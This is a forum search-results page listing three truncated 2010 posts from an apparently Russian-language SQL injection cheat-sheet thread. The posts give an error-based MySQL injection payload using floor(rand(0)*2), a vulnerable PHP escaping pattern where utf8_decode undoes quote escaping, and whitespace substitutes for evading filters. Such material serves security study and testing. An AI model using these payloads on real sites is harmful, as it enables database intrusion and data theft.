Вернуться   RDot > Поиск по форуму

Показано с 1 по 3 из 3.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: BlackFan
Раздел: Web-среда/Web-applications 19.07.2010, 11:43
Ответов: 105
Важно: Шпаргалка
Просмотров: 173,674
Автор BlackFan
Небольшое дополнение по Error-based инъекциям на...

Небольшое дополнение по Error-based инъекциям на основе rand(0).


Более короткая версия запроса:
or 1 group by concat(left(version(),64),floor(rand(0)*2)) having min(0)

Пояснения:
1) "OR 1"...
Раздел: Web-среда/Web-applications 17.07.2010, 11:53
Ответов: 105
Важно: Шпаргалка
Просмотров: 173,674
Автор BlackFan
UTF8 и экранирование кавычек $id =...

UTF8 и экранирование кавычек

$id = utf8_decode(mysql_real_escape_string($_GET['id']));
$zapros="SELECT * FROM news WHERE id='".$id."';"
echo($zapros);
http://test/script2.php?id=1'
SELECT *...
Раздел: Web-среда/Web-applications 15.07.2010, 22:10
Ответов: 105
Важно: Шпаргалка
Просмотров: 173,674
Автор BlackFan
Варианты пробелов в MySQL (извращенская версия) ...

Варианты пробелов в MySQL (извращенская версия)

plain text
%09, %0a, %0b, %0c, %0d, %20, %a0, /**/, +, %23%0a, --%0a

utf8_decode
%c0%09
%c0%0a
%c0%0b
%c0%0c
Показано с 1 по 3 из 3.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot